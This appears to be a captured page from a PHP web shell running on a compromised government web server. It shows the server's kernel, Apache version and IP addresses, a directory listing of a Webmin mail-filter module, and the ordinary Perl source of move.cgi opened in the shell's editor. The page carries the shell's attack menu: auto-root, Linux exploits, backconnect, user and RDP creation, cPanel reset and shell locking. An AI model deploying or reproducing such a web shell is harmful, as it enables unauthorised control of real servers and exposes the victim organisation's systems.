Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
filter /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
2.96
KB
-rw-r--r--
aliases-lib.pl
7.93
KB
-rwxr-xr-x
autoreply-file-lib.pl
2.28
KB
-rwxr-xr-x
config
218
B
-rw-r--r--
config.info
489
B
-rw-r--r--
config.info.ca
556
B
-rw-r--r--
config.info.ca.UTF-8
575
B
-rw-r--r--
config.info.cz
344
B
-rw-r--r--
config.info.cz.UTF-8
370
B
-rw-r--r--
config.info.de
598
B
-rw-r--r--
config.info.de.UTF-8
598
B
-rw-r--r--
config.info.el
264
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.nl
584
B
-rw-r--r--
config.info.nl.UTF-8
584
B
-rw-r--r--
config.info.no
527
B
-rw-r--r--
config.info.no.UTF-8
527
B
-rw-r--r--
config.info.pl
580
B
-rw-r--r--
config.info.pl.UTF-8
604
B
-rw-r--r--
delete.cgi
431
B
-rwxr-xr-x
down.cgi
261
B
-rwxr-xr-x
edit.cgi
8.97
KB
-rwxr-xr-x
edit_auto.cgi
3.11
KB
-rwxr-xr-x
edit_forward.cgi
1.18
KB
-rwxr-xr-x
filter-lib.pl
17.71
KB
-rwxr-xr-x
index.cgi
4.33
KB
-rwxr-xr-x
module.info
260
B
-rw-r--r--
module.info.ca
109
B
-rw-r--r--
module.info.ca.UTF-8
121
B
-rw-r--r--
module.info.cz
39
B
-rw-r--r--
module.info.cz.UTF-8
52
B
-rw-r--r--
module.info.de
114
B
-rw-r--r--
module.info.de.UTF-8
126
B
-rw-r--r--
module.info.hu
81
B
-rw-r--r--
module.info.hu.UTF-8
104
B
-rw-r--r--
module.info.ms_MY
109
B
-rw-r--r--
module.info.ms_MY.UTF-8
121
B
-rw-r--r--
module.info.nl
34
B
-rw-r--r--
module.info.nl.UTF-8
40
B
-rw-r--r--
module.info.no
37
B
-rw-r--r--
module.info.no.UTF-8
43
B
-rw-r--r--
module.info.pl
114
B
-rw-r--r--
module.info.pl.UTF-8
130
B
-rw-r--r--
move.cgi
1.61
KB
-rwxr-xr-x
save.cgi
7.63
KB
-rwxr-xr-x
save_auto.cgi
2.73
KB
-rwxr-xr-x
save_forward.cgi
959
B
-rwxr-xr-x
up.cgi
259
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : move.cgi
#!/usr/bin/perl # Apply a filter to email in some folder require './filter-lib.pl'; &ReadParse(); &error_setup($text{'move_err'}); # Get the filter @filters = &list_filters(); ($filter) = grep { $_->{'index'} == $in{'idx'} } @filters; $filter || &error($text{'save_egone'}); # Get the source and destination folders @folders = &mailbox::list_folders(); $src = &mailbox::find_named_folder($in{'movefrom'}, \@folders); $src || &error(&text('move_esrc', $in{'movefrom'})); $dest = &file_to_folder($filter->{'action'}, \@folders); $dest || &error(&text('move_edest', $filter->{'action'})); &mailbox::folder_name($src) eq &mailbox::folder_name($dest) && &error($text{'move_esame'}); &ui_print_unbuffered_header(undef, $text{'move_title'}, ""); # Find matching messages if ($filter->{'condspam'}) { @fields = ( [ "X-Spam-Status", "Yes" ] ); } elsif ($filter->{'condlevel'}) { $stars = "*" x $filter->{'condlevel'}; @fields = ( [ "X-Spam-Level", $stars ] ); } else { @fields = ( [ lc($filter->{'condheader'}), $filter->{'condvalue'}, 1 ] ); } print &text('move_finding', &mailbox::folder_name($src)),"<br>\n"; @mails = &mailbox::mailbox_search_mail(\@fields, 1, $src, undef, 1); if (!@mails) { print $text{'move_none'},"<p>\n"; } else { print &text('move_found', scalar(@mails)),"<p>\n"; print &text('move_moving', scalar(@mails), &mailbox::folder_name($dest)),"<br>\n"; &mailbox::mailbox_move_mail($src, $dest, reverse(@mails)); print $text{'move_done'},"<p>\n"; } if (defined(&theme_post_save_folder)) { &theme_post_save_folder($src); &theme_post_save_folder($dest); } &ui_print_footer("", $text{'index_return'});
Close